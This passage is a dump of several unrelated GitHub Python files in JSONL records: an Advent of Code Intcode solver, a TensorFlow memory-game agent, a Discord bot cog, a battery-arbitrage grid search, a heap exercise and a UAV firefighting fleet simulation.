numbers[number1()] = inputValue\n i += 2\n if opcode == 4:\n out_queue.put(numbers[number1()])\n i += 2\n if opcode == 5:\n if numbers[number1()] != 0:\n i = numbers[number2()]\n else:\n i += 3\n if opcode == 6:\n if numbers[number1()] == 0:\n i = numbers[number2()]\n else:\n i += 3\n if opcode == 7:\n if numbers[number1()] < numbers[number2()]:\n numbers[number3()] = 1\n else:\n numbers[number3()] = 0\n i += 4\n if opcode == 8:\n if numbers[number1()] == numbers[number2()]:\n numbers[number3()] = 1\n else:\n numbers[number3()] = 0\n i += 4\n if opcode == 9:\n relative_base += numbers[number1()]\n i += 2\n\ndef run_computer_file(filename):\n file = open(filename)\n lines = [line.rstrip('\\n') for line in file]\n file.close()\n numbers = list(map(int, lines[0].split(\",\")))\n numbers.extend([0] * 10000)\n numbers[0] = 2\n\n inQueue = Queue()\n outQueue = Queue()\n t = Thread(target = run_computer , args = (numbers.copy(), inQueue, outQueue, 0))\n t.start()\n\n scaffolds = set()\n spaces = set()\n i = 0\n j = 0\n maxi = 0\n maxj = 0\n startPoint = None\n # 76 = L\n # 82 = R\n # 56 = 8\n ORDER = [66, 44, 67, 44, 66, 44, 67, 44, 65, 44, 67, 44, 66, 44, 65, 44, 67, 44, 65, 10]\n A = [82, 44, 49, 48, 44, 76, 44, 56, 44, 76, 44, 52, 44, 82, 44, 49, 48, 10]\n B = [76, 44, 49, 50, 44, 76, 44, 56, 44, 82, 44, 49, 48, 44, 82, 44, 49, 48, 10]\n C = [76, 44, 54, 44, 76, 44, 52, 44, 76, 44, 49, 50, 10]\n for a in ORDER:\n inQueue.put(a)\n for a in A:\n inQueue.put(a)\n for a in B:\n inQueue.put(a)\n for a in C:\n inQueue.put(a)\n\n\n inQueue.put(110) # n\n #inQueue.put(121) # y\n inQueue.put(10)\n direction = 0 # 0 = UP, 1 = RIGHT, 2 = DOWN, 3 = LEFT\n while t.is_alive() or not outQueue.empty():\n out = outQueue.get()\n if out == 35:\n scaffolds.add((j, i))\n print('#', end='')\n elif out == 46:\n spaces.add((j, i))\n print('.', end='')\n elif out == 60 or out == 62 or out == 94 or out == 118:\n startPoint = (j, i)\n scaffolds.add((j, i))\n if out == 60:\n direction = 3\n print('<', end='')\n elif out == 62:\n direction = 1\n print('>', end='')\n elif out == 118:\n direction = 2\n print('v', end='')\n else:\n print('^', end='')\n elif out == 10:\n j = 0\n i += 1\n print()\n if i > maxi:\n maxi = i\n continue\n elif out < 150:\n print(str(chr(out)), end='')\n else:\n print(out)\n j += 1\n if j > maxj:\n maxj = j\n\n print()\n intersections = set()\n for scaffold in scaffolds:\n numNeighbours = 0\n for neighbour in ((scaffold[0], scaffold[1]+1), (scaffold[0], scaffold[1]-1), (scaffold[0]+1, scaffold[1]), (scaffold[0]-1, scaffold[1])):\n if neighbour in scaffolds:\n numNeighbours += 1\n if numNeighbours == 4:\n intersections.add(scaffold)\n\n currpoint = startPoint\n pointsToVisit = scaffolds.copy()\n pointsToVisit.remove(currpoint)\n intersectionsToVisit = intersections.copy()\n def left(point, direction):\n if direction == 0:\n return (point[0] - 1, point[1])\n if direction == 1:\n return (point[0], point[1] - 1)\n if direction == 2:\n return (point[0] + 1, point[1])\n if direction == 3:\n return (point[0], point[1] + 1)\n\n def right(point, direction):\n return left(point, (direction + 2) % 4)\n\n def forward(point, direction):\n return left(point, (direction + 1) % 4)\n\n def findPath(currpoint, direction, pointsToVisit, intersectionsToVisit):\n count = 0\n path = list()\n while len(pointsToVisit) > 0:\n if forward(currpoint, direction) in pointsToVisit:\n currpoint = forward(currpoint, direction)\n count += 1\n elif left(currpoint, direction) in pointsToVisit:\n currpoint = left(currpoint, direction)\n direction = (direction - 1) % 4\n if count > 0:\n path.append(count)\n count = 1\n path.append('L')\n elif right(currpoint, direction) in pointsToVisit:\n currpoint = right(currpoint, direction)\n direction = (direction + 1) % 4\n if count > 0:\n path.append(count)\n count = 1\n path.append('R')\n\n\n \n if currpoint in intersectionsToVisit:\n intersectionsToVisit.remove(currpoint)\n elif len(pointsToVisit) > 0:\n pointsToVisit.remove(currpoint)\n path.append(count)\n print(path)\n findPath(currpoint, direction, pointsToVisit, intersectionsToVisit)\n\nif __name__ == '__main__':\n output = run_computer_file('input')\n print(f'program output: {output}')\n","repo_name":"PatrikBillgren/AdventOfCode2019","sub_path":"17/2/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38704786071","text":"#!/usr/bin/env python3\n#\n# Team members:\n# Dominik Chodounský\n# Martin Lank\n# Juraj Kmec\n#\n# ReCodExIDs:\n# 882a1f6f-99a2-48df-aee6-1b62d6d0d2df\n# b503f10b-77cf-41be-a787-371a69cfa66a\n# 8c8b5f62-9f3e-4825-9966-185987537e3f\n\nimport argparse\nimport os\n\nos.environ.setdefault(\"TF_CPP_MIN_LOG_LEVEL\", \"2\") # Report only TF errors by default\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\n\nimport memory_game_environment\nimport wrappers\n\n# tf.config.run_functions_eagerly(True)\n# tf.data.experimental.enable_debug_mode()\n\nparser = argparse.ArgumentParser()\n# These arguments will be set appropriately by ReCodEx, even if you change them.\nparser.add_argument(\"--cards\", default=8, type=int, help=\"Number of cards in the memory game.\")\nparser.add_argument(\"--recodex\", default=False, action=\"store_true\", help=\"Running in ReCodEx\")\nparser.add_argument(\"--render_each\", default=0, type=int, help=\"Render some episodes.\")\nparser.add_argument(\"--seed\", default=None, type=int, help=\"Random seed.\")\nparser.add_argument(\"--threads\", default=16, type=int, help=\"Maximum number of threads to use.\")\n# If you add more arguments, ReCodEx will keep them with your default values.\nparser.add_argument(\"--batch_size\", default=64, type=int, help=\"Number of episodes to train on.\")\nparser.add_argument(\"--evaluate_each\", default=1024, type=int, help=\"Evaluate each number of episodes.\")\nparser.add_argument(\"--evaluate_for\", default=100, type=int, help=\"Evaluate for number of episodes.\")\nparser.add_argument(\"--hidden_layer\", default=None, type=int, help=\"Hidden layer size; default 8*`cards`\")\nparser.add_argument(\"--memory_cells\", default=None, type=int, help=\"Number of memory cells; default 2*`cards`\")\nparser.add_argument(\"--memory_cell_size\", default=None, type=int, help=\"Memory cell size; default 3/2*`cards`\")\n\n\ndef masked_sparse_categorical_crossentropy(y_true, y_pred, mask):\n y_true = tf.boolean_mask(y_true, mask)\n y_pred = tf.boolean_mask(y_pred, mask)\n return tf.keras.losses.SparseCategoricalCrossentropy()(y_true, y_pred)\n\n\nclass Network:\n def __init__(self, env: wrappers.EvaluationEnv, args: argparse.Namespace) -> None:\n self.args = args\n self.env = env\n\n # Define the agent inputs: a memory and a state.\n memory = tf.keras.layers.Input(shape=(args.memory_cells, args.memory_cell_size), dtype=tf.float32)\n # memory = tf.keras.layers.Masking(mask_value=-1)(memory)\n state = tf.keras.layers.Input(shape=env.observation_space.shape, dtype=tf.int32)\n # state = tf.keras.layers.Masking(mask_value=-1)(state)\n\n # Encode the input state, which is a (card, observation) pair,\n # by representing each element as one-hot and concatenating them, resulting\n # in a vector of length `sum(env.observation_space.nvec)`.\n encoded_input = tf.keras.layers.Concatenate()(\n [tf.one_hot(state[:, i], dim) for i, dim in enumerate(env.observation_space.nvec)])\n\n # Generate a read key for memory read from the encoded input, by using\n # a ReLU hidden layer of size `args.hidden_layer` followed by a dense layer\n # with `args.memory_cell_size` units and `tanh` activation (to keep the memory\n # content in limited range).\n x = tf.keras.layers.Dense(args.hidden_layer, activation='relu')(encoded_input)\n read_key = tf.keras.layers.Dense(args.memory_cell_size, activation='tanh')(x)\n\n # Read the memory using the generated read key. Notably, compute cosine\n # similarity of the key and every memory row, apply softmax to generate\n # a weight distribution over the rows, and finally take a weighted average of\n # the memory rows.\n normalized_memory = tf.math.l2_normalize(memory, axis=-1)\n normalized_read_keys = tf.math.l2_normalize(read_key, axis=-1)\n matvec = tf.linalg.matvec(normalized_memory, normalized_read_keys)\n softmax = tf.nn.softmax(matvec, axis=-1)\n read_value = tf.linalg.matvec(memory, softmax, transpose_a=True)\n\n # Using concatenated encoded input and the read value, use a ReLU hidden\n # layer of size `args.hidden_layer` followed by a dense layer with\n # `env.action_space.n` units and `softmax` activation to produce a policy.\n policy = tf.keras.layers.Concatenate(axis=1)([encoded_input, read_value])\n policy = tf.keras.layers.Dense(args.hidden_layer, activation='relu')(policy)\n policy = tf.keras.layers.Dense(env.action_space.n, activation='softmax')(policy)\n\n # Perform memory write. For faster convergence, append directly\n # the `encoded_input` to the memory, i.e., add it as a first memory row, and drop\n # the last memory row to keep memory size constant.\n updated_memory = tf.concat([tf.expand_dims(encoded_input, 1), memory[:, :-1]], axis=1)\n updated_memory = tf.squeeze(updated_memory) # To avoid adding extra dimension when batch_size = 1\n\n # Create the agent\n self._agent = tf.keras.Model(inputs=[memory, state], outputs=[updated_memory, policy])\n self._agent.compile(optimizer=tf.optimizers.Adam(),\n loss=masked_sparse_categorical_crossentropy)\n\n def zero_memory(self):\n # Return an empty memory. It should be a TF tensor\n # with shape `[self.args.memory_cells, self.args.memory_cell_size]`.\n return tf.zeros(shape=[self.args.memory_cells, self.args.memory_cell_size])\n\n @tf.function\n def _train(self, states, targets, episode_lengths, max_length):\n # Given a batch of sequences of `states` (each being a (card, symbol) pair),\n # train the network to predict the required `targets`.\n #\n # Specifically, start with a batch of empty memories, and run the agent\n # sequentially as many times as necessary, using `targets` as gold labels.\n #\n # Note that the sequences can be of different length, so you need to pad them\n # to same length and then somehow indicate the length of the individual episodes\n # (one possibility is to add another parameter to `_train`).\n batch_size = len(states)\n memory = tf.stack([self.zero_memory() for _ in range(batch_size)])\n for step in range(max_length):\n state = states[:, step]\n target = targets[:, step]\n mask = step < episode_lengths\n with tf.GradientTape() as tape:\n memory, policy = self._agent([memory, state])\n loss = self._agent.loss(target, policy, mask)\n grads = tape.gradient(loss, self._agent.trainable_variables)\n self._agent.optimizer.apply_gradients(zip(grads, self._agent.trainable_weights))\n\n def train(self, episodes):\n # Given a list of episodes, prepare the arguments\n # of the self._train method, and execute it.\n # len(e) - 1 because the last action is None and not interesting for training.\n state_batches, action_batches, episode_lengths = [], [], [len(e) - 1 for e in episodes]\n max_len = max(episode_lengths)\n\n for e in episodes:\n states, actions = [], []\n for step in range(max_len):\n if step < len(e) - 1: # Last action is None.\n states.append(e[step][0])\n actions.append(e[step][1])\n else:\n states.append([-1, -1])\n actions.append(-1)\n state_batches.append(states)\n action_batches.append(actions)\n\n self._train(np.array(state_batches), np.array(action_batches), np.array(episode_lengths), max_len)\n\n @wrappers.typed_np_function(np.float32, np.int32)\n @wrappers.raw_tf_function(dynamic_dims=1)\n def predict(self, memory, state):\n return self._agent([memory, state])\n\n\ndef main(env, args):\n # Set random seeds and number of threads\n if args.seed is not None:\n tf.keras.utils.set_random_seed(args.seed)\n tf.config.threading.set_inter_op_parallelism_threads(args.threads)\n tf.config.threading.set_intra_op_parallelism_threads(args.threads)\n\n # Post-process arguments to default values if not overridden on the command line.\n if args.hidden_layer is None:\n args.hidden_layer = 8 * args.cards\n if args.memory_cells is None:\n args.memory_cells = 2 * args.cards\n if args.memory_cell_size is None:\n args.memory_cell_size = 3 * args.cards // 2\n assert sum(env.observation_space.nvec) == args.memory_cell_size\n\n # Construct the network\n network = Network(env, args)\n\n def evaluate_episode(start_evaluation: bool = False, logging: bool = True) -> float:\n state, memory = env.reset(start_evaluation=start_evaluation, logging=logging)[0], network.zero_memory()\n rewards, done = 0, False\n while not done:\n # Find out which action to use\n memory, policy = network.predict([memory], [state])\n action = np.argmax(policy)\n state, reward, terminated, truncated, _ = env.step(action)\n done = terminated or truncated\n rewards += reward\n return rewards\n\n # Training\n training = True\n while training:\n # Generate required number of episodes\n for _ in range(args.evaluate_each // args.batch_size):\n episodes = []\n for _ in range(args.batch_size):\n episodes.append(env.expert_episode())\n\n # Train the network\n network.train(episodes)\n\n # Periodic evaluation\n returns = [evaluate_episode() for _ in range(args.evaluate_for)]\n if np.mean(returns) - 2 * np.std(returns) > 0:\n training = False\n\n # Final evaluation\n while True:\n evaluate_episode(start_evaluation=True)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args([] if \"__file__\" not in globals() else None)\n\n # Create the environment\n env = wrappers.EvaluationEnv(gym.make(\"MemoryGame-v0\", cards=args.cards), args.seed, args.render_each,\n evaluate_for=args.evaluate_for, report_each=args.evaluate_for)\n\n main(env, args)\n","repo_name":"chododom/Deep-Reinforcement-Learning","sub_path":"Week12/memory_game.py","file_name":"memory_game.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71446213871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAn example cog to show how things should be done.\n\nAlso provides a simple base for starting a new cog.\n\"\"\"\n# In this case, discord import is not needed, in some cases it may be.\n# import discord\nfrom discord.ext import commands\n\n\nclass ExampleCog(commands.Cog):\n \"\"\"The ping to your pong\"\"\"\n\n def __init__(self, bot):\n \"\"\"Save our bot argument that is passed in to the class.\"\"\"\n self.bot = bot\n\n @commands.command(\n name=\"ping\",\n help=\"The pong to your ping, let's you know that the bot is alive.\")\n async def ping(self, ctx):\n \"\"\"\n Create a simple ping pong command.\n\n This command adds some help text and also required that the user\n have the Member role, this is case-sensitive.\n \"\"\"\n await ctx.send(\"Pong\")\n\n\ndef setup(bot):\n \"\"\"\n Add the cog we have made to our bot.\n\n This function is necessary for every cog file, multiple classes in the\n same file all need adding and each file must have their own setup function.\n \"\"\"\n bot.add_cog(ExampleCog(bot))\n","repo_name":"FelixRandle/Sheffield-Discord-Bot","sub_path":"cogs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"7364080267","text":"import pandas as pd\nimport numpy as np\nimport sys, os\nfrom datetime import datetime as dt\nfrom utils_data import make_analysis_dataset, NODES, PATH_DATA\nfrom utils_battery import get_efficiency\nfrom utils_mdp_m import R, R2\nfrom utils_cv import train_test_split, crossval_VI\n\n# define file locations\nPATH_RESULTS = f'{PATH_DATA}results/'\nif not os.path.isdir(PATH_RESULTS):\n os.makedirs(PATH_RESULTS)\nPATH_RESULTS_LOG = f'{PATH_RESULTS}log/'\nif not os.path.isdir(PATH_RESULTS_LOG):\n os.makedirs(PATH_RESULTS_LOG)\n\n\ndef learn_modelbased_vi(node_idx, dur, hp_weight_rev, hp_store, hp_ma, R, S, logsuff):\n # if len(sys.argv) != 3:\n # raise Exception(\"usage: python learn_modelbased_approach.py \")\n # node_idx = int(sys.argv[1])\n # dur = int(sys.argv[2])\n\n # read in data\n df = make_analysis_dataset(nodes=[NODES[node_idx]])\n\n # set columns\n mark_cols = [col for col in df.columns if col.startswith(('lmp_rt_m'))] + ['lmp_da']\n node_cols = [col for col in df.columns if col.startswith(('node'))] \n time_cols = [col for col in df.columns if col.startswith(('h_'))] + ['weekday']\n XOLS_cols = mark_cols + time_cols + node_cols + ['lmp_rt_m1_rolling']\n Xvi_cols = ['lmp_rt_m1', 'lmp_rt_m2', 'lmp_rt_m1_rolling', 'lmp_da'] + time_cols\n y_col = 'lmp_rt'\n group_cols = ['year']\n\n # set params\n b_params = {'dur':dur, 'capacity':200}\n b_params['efficiency'] = get_efficiency(b_params['dur'])\n kmax=50\n\n # grid search\n gssum = {}\n gssummean = {}\n for wr in hp_weight_rev:\n for ws in hp_store:\n hp = [wr, ws]\n for ma in hp_ma:\n # redefine rolling period\n df['lmp_rt_m1_rolling'] = df.lmp_rt_m1.ewm(alpha=ma).mean()\n # split data\n X_tt, y_tt, g_tt, __, __ = train_test_split(df, XOLS_cols, y_col, group_cols, yr_val=2022)\n # cross validate\n label = f'wrev={wr}, wstor={ws}, ma={ma}'\n cvsum, cvsummean = crossval_VI(X_tt, Xvi_cols, y_tt, g_tt, hp, b_params, R, S, kmax, desc=label)\n print('mean revenue:', cvsummean['cumrev'])\n gssum[(wr, ws, ma)] = cvsum\n gssummean[(wr, ws, ma)] = cvsummean\n\n # save logs\n summ = pd.DataFrame([])\n for k, v in gssum.items():\n d = pd.DataFrame(v)\n d['w_roll'], d['w_e'], d['ma'] = k[0], k[1], k[2]\n summ = pd.concat([d, summ])\n summ.to_csv(f'{PATH_RESULTS}hptune_summ_{NODES[node_idx].lower()}_{dur}.csv', index=False)\n summ.to_csv(f'{PATH_RESULTS_LOG}hptune_summ_{NODES[node_idx].lower()}_{dur}_{logsuff}.csv', index=False)\n\n\nif __name__ == '__main__':\n\n node_idx = 0\n \n # 4-hr duration\n # hp_weight_rev = [0.25, 0.5, 0.75, 1.]\n # hp_store = [0., 5., 25.]\n # hp_ma = [0.5, 0.9]\n # learn_modelbased_vi(node_idx, 4, \n # hp_weight_rev, hp_store, hp_ma, R, None,\n # logsuff=dt.now().date().strftime(\"%Y%m%d\"))\n\n # 100-hr duration\n hp_weight_rev = [0., 0.25, 0.5, 0.66]\n hp_store = [5., 1.]\n hp_ma = [0.5, 0.9]\n learn_modelbased_vi(node_idx, 100, \n hp_weight_rev, hp_store, hp_ma, R2, 5000,\n logsuff=dt.now().date().strftime(\"%Y%m%d\"))\n \n\n","repo_name":"etrieschman/battery-charger","sub_path":"src/gridsearch_VI.py","file_name":"gridsearch_VI.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11583662684","text":"# [절댓값 힙]\n# 11286번\nimport sys\nimport heapq\n\nclass node:\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def __lt__(self, other):\n if self.a < other.a:\n return True\n elif self.a == other.a:\n return self.b < other.b\n else:\n return False\n def __str__(self):\n return str(self.b)\n\nn = int(sys.stdin.readline().rstrip())\nq = []\nfor _ in range(n):\n inp = int(sys.stdin.readline().rstrip())\n if inp != 0:\n heapq.heappush(q, node(abs(inp), inp))\n else:\n if len(q) == 0:\n print(0)\n continue\n else:\n print(heapq.heappop(q))\n","repo_name":"JungChangwoo/Algorithm_PS","sub_path":"Baekjoon/DataStructure/AbsoluteHeap.py","file_name":"AbsoluteHeap.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42147359298","text":"'''\nThese classes contain all individual UAV agents and the entire fleet. Building this very modular so that\nupdate rules for each agent can easily be added in, plus each UAV could have their own individual dynamics.\nStill need to add in update rules for the UAVs beyond dynamic update. Need to also decide how each UAV will\nhold the top-level synthesized controllers. Also need to translate Estefany's allocation function from Matlab\nto python\n'''\nimport os, imp, csv, re, math, numpy\nfrom Allocation import allocation_function\nfrom WaterControl_controller import TulipStrategy\nfrom random import uniform\n\n\nclass Agent(object):\n def __init__(self, state_truth, state_belief, name, dynamics, goal, region, water_level, pause_interval):\n # Initialize state of the agent\n self.state_truth = state_truth\n self.state_belief = state_belief\n self.name = name\n self.dynamic_model = dynamics()\n self.goal = goal\n self.desired_state = goal\n self.prev_state = state_belief\n self.prev_goal = goal\n self.goal_ind = 0\n self.base = 0\n self.region = region\n self.water_level = water_level\n self.water_dropped = 0\n self.ctrler = None\n self.wtr_ctrler = TulipStrategy()\n self.wtr_output = self.wtr_ctrler.move(0, 0, 0)\n self.sync_signal_prev = 1\n self.sync_signal = 1 # Will need to change eventually... (part of a function that observes other UAVs)\n self.pause_time = -pause_interval\n\n def __str__(self):\n return 'Agent: ' + self.name + ' State: ' + str(self.state)\n\n def __repr__(self):\n return self.__str__()\n\n def update_state_truth(self, tau, ctrl, dist=None, x_override=None):\n if x_override is None:\n self.state_truth = self.dynamic_model.integrate_state(tau, self.state, ctrl, dist)\n else:\n self.state_truth = self.dynamic_model.integrate_state(tau, x_override, ctrl, dist)\n\n def update_state_belief(self, state):\n self.state_belief = state\n\n def sensed_information(self):\n return 'I see nothing for now...'\n\n def update_objective_state(self, loc):\n self.prev_goal = self.goal\n self.goal = loc\n return True if self.prev_goal != self.goal else False\n\n def update_region(self, reg):\n self.region = reg\n return\n\n def update_water_lev(self, water):\n self.water_level = water\n return\n\n # Provides display vectors for triangle representation of self\n def display_loc(self, params):\n center = (self.state_truth[0] - 1, params.height - (self.state_truth[1] - 1))\n rot = numpy.array([[math.cos(self.state_truth[2]), -math.sin(self.state_truth[2])],\n [math.sin(self.state_truth[2]), math.cos(self.state_truth[2])]])\n rot1 = numpy.matmul(rot, params.FRONT_VECTOR)\n rot2 = numpy.matmul(rot, params.BACK_BOT_VECT)\n rot3 = numpy.matmul(rot, params.BACK_TOP_VECT)\n\n loc_center_screen = (params.WIDTH * center[0] + params.WIDTH / 2, params.HEIGHT * center[1] - params.HEIGHT / 2)\n vec1 = (loc_center_screen[0] + rot1[0], loc_center_screen[1] - rot1[1])\n vec2 = (loc_center_screen[0] + rot2[0], loc_center_screen[1] - rot2[1])\n vec3 = (loc_center_screen[0] + rot3[0], loc_center_screen[1] - rot3[1])\n return [vec1, vec2, vec3]\n\n\nclass Fleet(object):\n def __init__(self, graph):\n self.agents = {}\n self.graph = graph\n\n def __str__(self):\n msg = 'Agents:'\n for i in self.agents:\n msg += '\\n Agent: ' + str(i)\n return msg\n\n def __repr__(self):\n return self.__str__()\n\n def add_agent(self, agent):\n self.agents[agent.name] = agent\n return\n\n def allocate(self, env, params):\n allocation_function(self, params, env)\n #for i in self.agents:\n # self.agents[i].goal = [6.0, 8.0, math.pi * 3.0 / 2.0]\n\n # Used for management of all controllers attached to the agents\n def update_ctrls(self, env, time, params):\n for i in self.agents:\n trigger1 = True if self.agents[i].goal != self.agents[i].prev_goal else False\n if trigger1 is False:\n region = self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal, time)\n #print(region)\n trigger2 = False if region == self.agents[i].region else True\n self.agents[i].update_region(region)\n else:\n # print(self.agents[i].state_belief)\n self.agents[i].update_region(self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal, time))\n #print(self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal))\n trigger2 = True\n #if time > 21:\n #print(self.agents[i].region)\n #print(i)\n #print(self.agents[i].state_belief)\n #print(self.agents[i].state_truth)\n #print(self.agents[i].goal)\n #print(trigger1)\n #print(trigger2)\n\n #input('wait...')\n\n if trigger1 is True or trigger2 is True:\n #print(self.agents[i].state_belief)\n #print(self.agents[i].goal)\n hand = self.directory_interpreter(self.agents[i].state_belief, self.agents[i].goal, time)\n self.agents[i].ctrler = hand.TulipStrategy()\n #print(self.agents[i].region)\n if self.agents[i].region == 1:\n output = self.agents[i].ctrler.move(0, self.agents[i].sync_signal, 0)\n else:\n output = self.agents[i].ctrler.move(0, 0)\n #print(output)\n # print(output[\"loc\"])\n # if time hasn't exceeded the original pause time for the agent plus the interval, don't update agent\n # TODO reimplement\n '''if time - self.agents[i].pause_time < params.stop_interval:\n print('skipped state output below')\n print(time)\n print(self.agents[i].pause_time)\n self.agents[i].control_inputs = (0.0, 0.0)\n continue'''\n\n # gather current location and fire status\n loc = (round(self.agents[i].state_belief[0]), round(self.agents[i].state_belief[1]))\n fire = 1 if env.cells[loc].fire > 0 else 0\n\n # stop signal logic for updating an agent TODO fix stop signal variable\n stop_signal = 0 # if uniform(0,1) > 1 - params.stop_fail else 0\n self.agents[i].pause_time = time if stop_signal == 1 else -params.stop_interval\n\n # move synthesized controller given updates on environment (need to modify so that only two inputs used if\n # other controller is used)\n if self.agents[i].region == 1:\n output = self.agents[i].ctrler.move(fire, self.agents[i].sync_signal, stop_signal)\n else:\n output = self.agents[i].ctrler.move(fire, stop_signal)\n #print(output)\n # print(output[\"loc\"])\n # update controller outputs for angle to reflect true values\n values = re.findall('\\d+', output[\"loc\"])\n\n if int(values[2]) == 1:\n values[2] = math.pi / 2.0\n elif int(values[2]) == 2:\n values[2] = 0.0\n elif int(values[2]) == 3:\n values[2] = 3.0 * math.pi / 2.0\n else:\n values[2] = math.pi\n\n # update various belief states and previous states, plus desired states and control inputs\n self.agents[i].prev_state = self.agents[i].state_belief\n self.agents[i].desired_state = (float(values[0]), float(values[1]), values[2])\n #print(self.agents[i].prev_state)\n #print(self.agents[i].desired_state)\n\n # find control inputs from graph... TODO: FIX THIS PORTION\n for n in self.graph.graph:\n # print(n)\n # print(self.agents[i].prev_state)\n if ((abs(self.agents[i].prev_state[0] - n[0]) < 0.00001 or abs(self.agents[i].prev_state[0] - 2 * math.pi - n[0]) < 0.00001) and\n (abs(self.agents[i].prev_state[1] - n[1]) < 0.00001 or abs(\n self.agents[i].prev_state[1] - 2 * math.pi - n[1]) < 0.00001) and\n (abs(self.agents[i].prev_state[2] - n[2]) < 0.00001 or abs(\n self.agents[i].prev_state[2] - 2 * math.pi - n[2]) < 0.00001)):\n parent_node = n\n break\n for n in self.graph.graph[parent_node].children:\n # print n\n # print self.agents[i].desired_state\n if (abs(self.agents[i].desired_state[0] - n[0]) < 0.00001 and\n abs(self.agents[i].desired_state[1] - n[1]) < 0.00001 and\n abs(self.agents[i].desired_state[2] - n[2]) < 0.00001):\n control_in = self.graph.graph[parent_node].children[n][0]\n # print(control_in)\n self.agents[i].control_inputs = (control_in[0], control_in[1])\n # print(self.agents[i].control_inputs)\n\n base = self.agents[i].base\n goal = self.agents[i].goal_ind if base == 0 else 0\n # 4. Update water controller\n wtr_out_prev = self.agents[i].wtr_output\n self.agents[i].wtr_output = self.agents[i].wtr_ctrler.move(base, self.agents[i].sync_signal, goal)\n val = re.findall('\\d+', self.agents[i].wtr_output[\"loc\"])\n # add water dropped by UAV to the appropriate cell\n if wtr_out_prev[\"loc\"] != self.agents[i].wtr_output[\"loc\"]:\n val2 = re.findall('\\d+', wtr_out_prev[\"loc\"])\n env.cells[\n (round(self.agents[i].state_truth[0]), round(self.agents[i].state_truth[1]))].water_accum = \\\n env.cells[\n (round(self.agents[i].state_truth[0]), round(self.agents[i].state_truth[1]))].water_accum + \\\n (float(val2[0]) - float(val[0]))/100.0*params.max_water_capacity\n\n self.agents[i].water_level = int(val[0]) # not necessary I think\n #print(self.agents[i].water_level)\n\n # update goal index and base index to agent's belief (done here because we are assuming the UAV makes it,\n # and that the controller move was enacted correctly\n self.agents[i].goal_ind = 1 if (output[\"GoalPos\"] and self.agents[i].sync_signal_prev) else 0\n self.agents[i].base = 1 if output[\"Base\"] else 0\n\n return\n\n def update(self, env, params, time_step, force_endpoint=False):\n\n # Layout:\n for i in self.agents:\n # Propagate state forward for now (no environmental inputs at the moment)\n self.agents[i].state_truth = self.agents[i].dynamic_model.integrate_state(time_step,\n self.agents[i].state_truth,\n self.agents[i].control_inputs,\n (0.0, 0.0, 0.0))\n\n # 2. Update the belief of the agent (for this purpose, this is tied directly to the output of the function)\n if self.agents[i].state_truth[2] < 0.0:\n state2 = math.fmod(self.agents[i].state_truth[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(self.agents[i].state_truth[2], 2.0 * math.pi)\n\n self.agents[i].state_belief = [self.agents[i].state_truth[0], self.agents[i].state_truth[1], state2]\n\n # returns the module for accessing the class (use return.myClass())\n def directory_interpreter(self, state, goal, time):\n if state[2] < 0.0:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n\n if abs(state2) < 0.000001 or abs(state2 - 2 * math.pi) < 0.000001:\n ori = '2'\n elif abs(state2 - math.pi / 2.0) < 0.000001:\n ori = '1'\n elif abs(state2 - math.pi) < 0.000001:\n ori = '4'\n else:\n ori = '3'\n\n file_name = 'G' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + 'Pos' + str(int(round(state[0]))) \\\n + '_' + str(int(round(state[1]))) + 'Ori' + ori + '.py'\n file_name2 = 'G' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + 'Pos' + str(int(round(state[0]))) \\\n + '_' + str(int(round(state[1]))) + 'Ori' + ori + 'NB.py'\n top_directory = 'Goal' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1])))\n #if time > 21:\n # print('ctrls/' + top_directory + '/' + file_name)\n # print(os.path.exists('ctrls/' + top_directory + '/' + file_name))\n if os.path.exists('../ctrls/' + top_directory + '/' + file_name2):\n return imp.load_source('TulipStrategy', '../ctrls/' + top_directory + '/' + file_name2)\n else:\n return imp.load_source('TulipStrategy', '../ctrls/' + top_directory + '/' + file_name)\n\n # return region associated with goal\n def region_interpreter(self, state, goal, time):\n if state[2] < 0.0:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n\n if abs(state2) < 0.000001 or abs(state2 - 2 * math.pi) < 0.000001:\n ori = '2'\n elif abs(state2 - math.pi / 2.0) < 0.000001:\n ori = '1'\n elif abs(state2 - math.pi) < 0.000001:\n ori = '4'\n else:\n ori = '3'\n\n file_name = 'Fire_UAV_simulation/W_partitions/Goal' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + '.csv'\n # print(file_name)\n state_name = 'Pos' + str(int(round(state[0]))) + '_' + str(int(round(state[1]))) + 'Ori' + ori\n #print(os.getcwd())\n # print(state_name)\n #if time > 21:\n # print(file_name)\n # print(state_name)\n with open(file_name, 'rb') as f:\n reader = csv.reader(f)\n listy = list(reader)\n\n for i in range(0, len(listy)):\n if state_name in listy[i]:\n return i + 1\n\n return 